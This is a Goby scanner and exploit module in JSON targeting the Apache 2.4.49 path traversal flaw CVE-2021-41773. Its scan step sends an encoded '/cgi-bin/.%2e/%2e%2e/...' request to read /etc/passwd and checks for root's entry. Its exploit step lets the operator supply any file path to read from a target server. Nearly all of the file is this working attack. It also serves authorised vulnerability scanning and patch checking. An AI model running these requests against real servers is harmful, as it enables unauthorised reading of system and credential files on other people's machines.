Apache_2.4.49_Path_Traversal_CVE_2021_41773.json
{
"Name": "Apache 2.4.49 Path Traversal (CVE-2021-41773)",
"Level": "2",
"Tags": [
"fileread"
],
"GobyQuery": "product=\"Apache-Web-Server\"",
"Description": "An attacker can use a path traversal attack to map URLs to files outside the intended document root. If files outside the document root are not protected by 'require all denied', attackers can access them.",
"Product": "Apache/2.4.49",
"Homepage": "https://httpd.apache.org",
"Author": "[email protected]",
"Impact": "<p>An attacker can use a path traversal attack to map URLs to files outside the intended document root. If files outside the document root are not protected by 'require all denied', attackers can access them.<br></p>",
"Recommendation": "<p>Users can protect themselves by upgrading to version 2.4.50. Note that researchers report that \"Require all denied\" (denying access to all requests) is the default setting protecting files outside the web root directory, which mitigates this problem. Confirm the current fixed release against the Apache HTTP Server security advisories before relying on a specific version.<br></p>",
"References": [
"https://mp.weixin.qq.com/s?src=11&timestamp=1633533436&ver=3358&signature=2WIeZ*MU*D90aNdj2wmW55th5WWecksL2I8I8u2J*jnnq17UCiSkdje1JJGlIqGfzv61pmOfWG7lpRv7rkX1pMirxKVDViUr33H4eKZGzhSfBVtKdXAWV3a5prZoIvq-&new=1"
],
"HasExp": true,
"ExpParams": [
{
"Name": "path",
"Type": "input",
"Value": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "regex",
"value": "root:[x*]?:0:0:",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "{{{path}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||undefined"
]
}
],
"PostTime": "2021-10-06 23:35:03",
"GobyVersion": "1.8.301"
}